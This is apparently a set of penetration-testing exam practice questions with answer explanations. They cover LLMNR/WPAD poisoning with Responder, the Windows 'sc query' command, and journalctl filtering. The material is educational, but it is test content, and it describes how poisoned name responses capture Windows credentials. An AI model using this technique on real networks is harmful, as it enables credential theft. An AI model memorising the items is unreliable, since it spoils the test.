You are conducting a network-based exploit against a Windows-based network. After running Responder in Kali Linux for about 15 minutes, you see the following output on your screen: Poisoned answer sent to *IP* for name wpad To validate if your attack was successful, you also analyze a Wireshark packet capture of this attack. A portion of that Wireshark packet capture is shown here: Source -> Destination -> Protocol LLMNR -> Standard query A. wpad Based on the output and packet capture above, which of the following types of exploits did you use? A. FTP exploit B. LLMNR exploit C. DNS cache poisoning D. Pass the hash attack
Windows computers do not rely on DNS for name resolution within the internal networks. Instead, they rely on NetBIOS Name Service (NBNS) queries. Since Windows Vista, though, NBNS queries have been replaced with the Link-Local Multicast Name Resolution (LLMNR) protocol. The Responder tool in Kali Linux is used to conduct NBNS, LLMNR, and DNS name resolution exploits. In this example, Responder is being used to answer the Windows host asking for name resolution for the system called "wpad" but provides the IP for the Kali Linux machine instead of the correct IP. The first highlighted section shows the LLMNR query for the host "wpad" being sent by the Windows 7 host and answered by the Kali host running Responder. The last highlighted section shows the Windows 7 host getting the wpad.dat file by providing its credentials to the Kali host. There are several clues in this question to the right answer. First, the question mentions that you waited 15 minutes. Within Windows networks using the older NetBIOS system, each Windows machine would send out a broadcast message with its IP and WINS name every 10-15 minutes. Some of this functionality remains within LLMNR, too. But, the easier clue to identify is from the Wireshark packet capture. It clearly shows the protocol being used in lines 1212 through 1216 as LLMNR during the query and response. For this question, I was even nice enough to highlight that portion in red, but don't expect the exam to be nearly as kind!
What command could be used to list the active services from the Windows command prompt? A. sc query \\servername B. sc config C. sc query type= running D. sc query
Windows uses the sc query command to display information about running services. It is part of the Service Control command-line tool, known as sc. The sc config command will modify the value of a service's entries in the registry and the Service Control Manager database. The sc query command will obtain and display information about the specified service, driver, type of service, or driver type. By entering just sc query, the command will return information on the active services only. By using the type=running option, only the information on the running services will be displayed. If the command sc query \\servername is used, then the remote server's active services (\\servername) will be displayed.
You are working on a hacking challenge on a Linux server owned by Dion Training. You have already gained initial access to the server and successfully elevated your privileges to root. As part of the challenge, you must locate any sudo commands issued by a user named Terri (whose login account is terri and UID=1003). Which of the following commands would successfully display every instance of the sudo command issued by Terri on this Linux server most efficiently? A. journalctl _UID=1003 | grep -e [Tt]erri | grep -e 1003 | grep sudo B. journalctl _UID=1003 | grep -e 1003 | grep sudo C. journalctl _UID=1003 | grep sudo D. journalctl _UID=1003 | grep -e [Tt]erri | grep sudo
journalctl is a command for viewing logs collected by systemd. The systemd-journald service is responsible for systemd's log collection, and it retrieves messages from the kernel, systemd services, and other sources. These logs are gathered in a central location, which makes them easy to review. If you specify the parameter _UID=1003, you will only receive entries made under the authority of the user with ID (UID) 1003. In this case, that is Terri. Using the piping function, we can send that list of entries into the grep command as an input and then filter the results before returning them to the screen. This command will be sufficient to see all the times that Terri has executed something as the superuser using privilege escalation. If there are too many results, we could further filter the results using regular expressions with grep using the -e flag. Since the UID of 1003 is only used by Terri, it is unnecessary to add [Tt]erri to your grep filter, as the only results for UID 1003 (terri) will already be shown. So, while all four of these would produce the same results, the most efficient option to accomplish this is by entering "journalctl _UID=1003 | grep sudo" in the terminal. Don't be afraid when you see questions like this; walk through each part of the command step by step and determine the differences. In this question, you may not have known what journalctl is, but you didn't need to. You needed to identify which grep expression was the shortest that would still get the job done. By comparing the differences between the options presented, you could likely take your best guess and identify the right one.
